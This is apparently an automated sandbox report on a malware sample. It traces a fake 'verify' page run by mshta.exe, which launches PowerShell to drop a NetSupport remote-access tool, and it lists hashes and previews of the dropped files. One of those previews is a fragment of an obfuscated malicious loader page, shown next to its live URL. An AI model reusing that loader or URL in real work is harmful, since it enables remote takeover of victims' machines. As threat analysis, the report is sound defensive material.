                                                                                                                                                              • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, use.fontawesome.com.cdn.cloudflare.net, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, update.googleapis.com, clients.l.google.com
                                                                                                                                                              • Execution Graph export aborted for target mshta.exe, PID 7848 because there are no executed function
                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                              • VT rate limit hit for: https://inspyrehomedesign.com/Ray-verify.html

                                                                                                                                                              Simulations

                                                                                                                                                              Behavior and APIs

                                                                                                                                                              TimeTypeDescription
                                                                                                                                                              14:46:11API Interceptor1x Sleep call for process: mshta.exe modified
                                                                                                                                                              14:46:14API Interceptor106x Sleep call for process: powershell.exe modified
                                                                                                                                                              14:47:05API Interceptor176x Sleep call for process: client32.exe modified

                                                                                                                                                              LLM Input / Output

                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                              IPs

                                                                                                                                                              No context

                                                                                                                                                              Domains

                                                                                                                                                              No context

                                                                                                                                                              ASNs

                                                                                                                                                              No context

                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                              No context

                                                                                                                                                              Dropped Files

                                                                                                                                                              No context

                                                                                                                                                              Created / dropped Files

                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\33CUD2J1\loca[1].htm

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\bpsFyf\client32.exe
                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                              Category:modified
                                                                                                                                                              Size (bytes):15
                                                                                                                                                              Entropy (8bit):2.7329145639793984
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:QJgTG:QkG
                                                                                                                                                              MD5:8AB0D91EF06123198FFAC30AD08A14C7
                                                                                                                                                              SHA1:46D83BB84F74D8F28427314C6084CC9AFE9D1533
                                                                                                                                                              SHA-256:DB50064FEE42FB57DCFD9C4269A682331246224D6108A18DB83ABD400CCECA12
                                                                                                                                                              SHA-512:1AA8560708AD663C4D5D0C2199E2CE472D11748EDA18848AAA3430C6F333BB04DA65DFFF4144BFEEA3860CA30F7F832EC64FF6D5B0731AC8878050601AC7A3A3
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:32.7767,-96.797

                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\AN5UOLP8\Ray-verify[1].htm

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\System32\mshta.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):10478
                                                                                                                                                              Entropy (8bit):6.1437966409549345
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:+YdzCOGbqUhwFRyC7lzBpi58Q0cW3O3AMw8+Ezgl02pmiV5ASidm4EcMvYf5:+YduOGPwFz7lzO58Q0m+0MnX4X
                                                                                                                                                              MD5:977BB6913B1F65A6472727EA4F362E97
                                                                                                                                                              SHA1:1D1247A8F9359576C913E9586D72F0D51773B22C
                                                                                                                                                              SHA-256:CACE794532FFC2A8275C86E4248CA38CF85DFB209D630E05E049D6FE2047EA2E
                                                                                                                                                              SHA-512:02E3D08AFED87051CD5D7DE046CFECE58731901EF985F8A76E4110130ED4A364ABAC06E77D124E185E146502BF4170AAF07E81272DB9C100FAFF878ACFE48EFA
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><META NAME='GENERATOR' Content='The source code of this page is encrypted with HTML Guardian, the world's standart for website protection. Visit http://www.protware.com for details'><meta http-equiv='expires' content=''><script>l1l=document.documentMode||document.all;var c6efa=true;ll1=document.layers;lll=window.sidebar;c6efa=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');c6efa|=lII;zLP=location.protocol+'0FD';ilY5HP79zs2='e6Fwtnl9Iy7X';</script><script>oS3zB7k=new Array();oS3zB7k[0]='\141\151\165%31%49%4A%31%33%48\121%32%38';wL6mXZ4=new Array();wL6mXZ4[0]='.<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C~..D.T.D. .X.H.T.M.L. .1...0. .T.r.a.n.s.i.t.i.o.n.a.l~..E.N."~.~\n.t.p.:~..w~B...w.3...o.r.g./.T.R./.x~\n~..1./~..D~N~P.l.1.-.t~-~/~1~3~5.l...d.t.d.".>.\r.\n.<~W. .x~.~/.=."~=~?~A~C~E

                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):11608
                                                                                                                                                              Entropy (8bit):4.890472898059848
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                                                                                                                              MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                                                                                                                              SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                                                                                                                              SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                                                                                                                              SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):17640
                                                                                                                                                              Entropy (8bit):5.486548466185529
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:384:RBhjrVVMuHAx0B4cIpvIU6XNqa4vqzpfO48n5aiTkJRBOtqkovbhpFN8Zgn:trrMp0eaXNqa40Zqp6RKEbhpwZ6
                                                                                                                                                              MD5:AB56647317D7F17022D3617E27014E0A
                                                                                                                                                              SHA1:0B5D58A45391E492B4703A6D60440080C0A35C2B
                                                                                                                                                              SHA-256:26467D122190301517F995566D89BE5E82AD0D6987A20D3FE41ED592AC565BBE
                                                                                                                                                              SHA-512:B7262E9E765A8A2D8BD26DA6FE843BAD11D25B28F9E74C04E91C996D6FE78699AC70DBC20DD50B275906137409B31DA5AB7C69AB40E875EE52BEB84E46B0303B
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:@...e................................................@..........H...............o..b~.D.poM...C..... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.....8.......System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.F.....%.Microsoft.PowerShell.Commands.Utility...D....................+.H..!...e........System.Configuration.Ins

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_egh3avmr.zhn.psm1

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):60
                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mshhzrqx.05j.ps1

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):60
                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 28 17:45:15 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2673
                                                                                                                                                              Entropy (8bit):3.9791573052758777
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:8nKXdiTu6SAH+idAKZdA1FehwiZUklqehRy+3:8ndrSl+y
                                                                                                                                                              MD5:A7078C529B164AD11749239213F5300B
                                                                                                                                                              SHA1:7DB644D9642CF502BB62E864D05D1E53976BF442
                                                                                                                                                              SHA-256:7226CEAC76363B8644C247699E6F399BEEA0C43CBEC5FB48B203CBEF7C1584AA
                                                                                                                                                              SHA-512:07BEA185CA438A5331496EC7A7615F3D61194B88EF204F1E1C21E9AF90E6C80B39B0267220B5DD3D761609AB53B3A41FC18997DF0963711A73464944F47C77FF
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:L..................F.@.. ...$+.,........i)..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I\Y......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V\Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V\Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V\Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V\Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........67e......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 28 17:45:15 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2675
                                                                                                                                                              Entropy (8bit):3.995902864324656
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:8HFXdiTu6SAH+idAKZdA1seh/iZUkAQkqehuy+2:8H+rS79Qzy
                                                                                                                                                              MD5:0D22629B6E8E308635DC3232AB865F2F
                                                                                                                                                              SHA1:418943C0635EBFF72D058F6EE7D53F069B38CAC6
                                                                                                                                                              SHA-256:60FB8C86CD3E936D4501DB100EB5D34080B54077F1D38E328C1EC0354D11398B
                                                                                                                                                              SHA-512:4219879BAE9FD68B70936970C75361B031BA99897EFC3CBA9402E90A00DC388434CC90340285C159829FAFCA8503CEA6C088A8FA507655A2F017F9245A624B1A
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:L..................F.@.. ...$+.,........i)..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I\Y......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V\Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V\Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V\Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V\Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........67e......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2689
                                                                                                                                                              Entropy (8bit):4.003723006029388
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:86XdiTu6AH+idAKZdA14meh7sFiZUkmgqeh7sYy+BX:8Nrvnqy
                                                                                                                                                              MD5:CABEE07B70231FA7507182A8497EBFDB
                                                                                                                                                              SHA1:6D64B4C5E024A4748CF2AF80B8F1A5623E6800FF
                                                                                                                                                              SHA-256:7E7126D0180DC4373996A27B00426B733656B2DEE8E5F65F704A17CDA66E9490
                                                                                                                                                              SHA-512:EA7612B5847345ACA2B8867F1CC425FFD7B4E035EA66F19A3BCD6BA97E6CABE10A6F99157E7254A1D0BC0A0723F70923CC776CA6F733869848325FBFB16F4FD0
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I\Y......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V\Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V\Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V\Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........67e......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 28 17:45:14 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2677
                                                                                                                                                              Entropy (8bit):3.992674802425967
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:8GXdiTu6SAH+idAKZdA1TehDiZUkwqehCy+R:8RrSoQy
                                                                                                                                                              MD5:8FC571BDCCDE0E20859052D765A17872
                                                                                                                                                              SHA1:D99D2AB6EF3C3D0E719B88BB97DEE06816E92590
                                                                                                                                                              SHA-256:7BE1A66EAC1D9BAAC0441BDCA8530ED57D35A89A4066FAB3BCC019446659E58F
                                                                                                                                                              SHA-512:A72DD43FA39CF4BEC3D8B71E75C68833F9659C09AD6730484F8A4E6490662232BD69B7B0E0E65091064DFEB0F2A1905D6573185A226289A52E95D067DF0D9AB1
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:L..................F.@.. ...$+.,....."..i)..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I\Y......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V\Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V\Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V\Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V\Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........67e......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 28 17:45:15 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2677
                                                                                                                                                              Entropy (8bit):3.982302607280827
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:8FXdiTu6SAH+idAKZdA1dehBiZUk1W1qehEy+C:8+rSY9ky
                                                                                                                                                              MD5:7659E7DEFF411F30E7B2DC54D6332368
                                                                                                                                                              SHA1:3F1155099BBD6B14C3CD4D245412513D799AE082
                                                                                                                                                              SHA-256:E3C3C78D78F406BCF5FDA6A93319A82ABF50FB6DC01C2777C91EA279E0F9432C
                                                                                                                                                              SHA-512:0375A1CA7F3A339DC0DACF1AB14B8C2E1B721795D87B4BB2D6893D3618D93E050585C072B8F1B3904D96B8FBE2C54DD3BE2C6860152F0521C6F91B5EDF03D113
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:L..................F.@.. ...$+.,........i)..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I\Y......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V\Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V\Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V\Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V\Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........67e......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 28 17:45:14 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2679
                                                                                                                                                              Entropy (8bit):3.991232123413837
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:8TiXdiTu6SAH+idAKZdA1duTeehOuTbbiZUk5OjqehOuTbqy+yT+:8TlrSqTfTbxWOvTbqy7T
                                                                                                                                                              MD5:C4C9639DC5A380A21BFF0F381755DEA4
                                                                                                                                                              SHA1:07EF594A7E2C27CBCA512C15F1C5B0038EC5E04A
                                                                                                                                                              SHA-256:57683A063070B5EDA9561C0EF3F4BA8E8819102E74A14A13FFFB12649B839146
                                                                                                                                                              SHA-512:2D60AFC0202B158B13F7C0F1DD6743354F11E3222BC6CAF76BC0D7FA9C03BB8C7353C0027BDC9509570C14195590B20105BFBF15D842D1CEF750962BF6C5F340
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:L..................F.@.. ...$+.,.......i)..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I\Y......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V\Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V\Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V\Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V\Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........67e......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                              C:\Users\user\AppData\Roaming\bpsFyf\HTCTL32.DLL

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):328056
                                                                                                                                                              Entropy (8bit):6.754723001562745
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6144:2ib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OK/Y:2ib5YbsXioEgULFpSzya9/lY5SilQCfg
                                                                                                                                                              MD5:2D3B207C8A48148296156E5725426C7F
                                                                                                                                                              SHA1:AD464EB7CF5C19C8A443AB5B590440B32DBC618F
                                                                                                                                                              SHA-256:EDFE2B923BFB5D1088DE1611401F5C35ECE91581E71503A5631647AC51F7D796
                                                                                                                                                              SHA-512:55C791705993B83C9B26A8DBD545D7E149C42EE358ECECE638128EE271E85B4FDBFD6FBAE61D13533BF39AE752144E2CC2C5EDCDA955F18C37A785084DB0860C
                                                                                                                                                              Malicious:true
                                                                                                                                                              Yara Hits:
                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\bpsFyf\HTCTL32.DLL, Author: Joe Security
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......=G....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Roaming\bpsFyf\NSM.LIC

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):257
                                                                                                                                                              Entropy (8bit):5.119720931145611
                                                                                                                                                              Encrypted:false
